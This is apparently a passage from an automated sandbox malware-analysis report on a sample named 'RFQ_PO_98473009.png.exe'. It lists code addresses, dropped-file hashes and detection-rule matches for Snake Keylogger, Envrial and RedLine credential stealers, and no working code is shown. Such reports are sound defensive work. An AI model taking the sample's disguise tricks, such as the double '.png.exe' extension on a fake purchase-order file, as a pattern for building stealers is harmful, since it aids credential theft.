                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645C8D012_2_0645C8D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645FAD812_2_0645FAD8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645B2E112_2_0645B2E1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645B2F012_2_0645B2F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064580F012_2_064580F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064504F812_2_064504F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645E4F812_2_0645E4F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645909012_2_06459090
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645C29012_2_0645C290
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645F49812_2_0645F498
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645ACB012_2_0645ACB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06457AB012_2_06457AB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645DEB812_2_0645DEB8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645D55012_2_0645D550
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645A35012_2_0645A350
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06458D7012_2_06458D70
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645BF7012_2_0645BF70
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645F17812_2_0645F178
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645050812_2_06450508
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645CF1012_2_0645CF10
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645872212_2_06458722
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645B93012_2_0645B930
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645873012_2_06458730
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_064509C112_2_064509C1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645E1C912_2_0645E1C9
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645AFD012_2_0645AFD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06457DD012_2_06457DD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0645E1D812_2_0645E1D8
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe 7799DAC5FDF78F132FA4F65DD31ABE052CB68EEB17EDA71E63A0365077C6DE15
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Native_snake01.exe F3206DA0BBB65CBE611245A9C3CE4A6EC550A3203BE4C2F0D4766DCE1959ADD1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe | Code function: String function: 0040E1D8 appears 44 times
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe | Code function: String function: 0040E1D8 appears 44 times
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1232343158.0000000005B70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1223205034.00000000033D8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1234608709.000000000796B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePoweo3 vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1235346180.0000000007A10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1221380126.000000000147E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000009.00000002.1205717774.0000000002780000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe, 00000009.00000002.1205717774.0000000002780000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAubriella.exe4 vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe | Binary or memory string: OriginalFilenamehpLp.exe2 vs RFQ_PO_98473009.png.exe
                      Source: RFQ_PO_98473009.png.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
